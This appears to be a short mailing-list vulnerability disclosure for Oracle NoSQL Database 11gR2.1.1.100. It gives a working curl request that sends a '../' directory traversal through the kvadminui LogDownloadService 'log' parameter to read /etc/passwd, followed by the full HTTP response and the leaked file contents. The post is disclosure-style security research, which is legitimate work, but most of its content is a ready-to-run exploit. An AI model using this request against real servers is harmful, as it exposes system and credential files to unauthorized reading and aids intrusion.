Oracle NoSQL suffers from a directory traversal vulnerability that allows for local file disclosure.
a258a0fc5675c177495ffc4cf826f7dea1d548b9dbe6d36326f3afab336ac958
Hi List,
I don't know if this worth anything, because the manual says:
"Oracle NoSQL Database is intended to be installed in a secure
location where physical and network access to the store is restricted
to trusted users. For this reason, at this time Oracle NoSQL
Database's security model is designed to prevent accidental access to
the data. It is not designed to prevent malicious access or
denial-of-service attacks."
Anyway, here is the deal:
+++
$ curl -v http://127.0.0.1:5001/kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd
* About to connect() to 127.0.0.1 port 5001 (#0)
* Trying 127.0.0.1... connected
* Connected to 127.0.0.1 (127.0.0.1) port 5001 (#0)
> GET /kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
> User-Agent: curl/7.21.3 (i686-pc-linux-gnu) libcurl/7.21.3 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.18
> Host: 127.0.0.1:5001
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Type: application/octet-stream
< Content-Length: 1668
< Content-Disposition: attachment;
filename="../../../../../../../../../../../../../../../etc/passwd"
< Server: Jetty(7.4.0.v20110414)
<
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
[...]
+++
Software: Oracle NoSQL Database 11gR2.1.1.100
Regards,
Buherator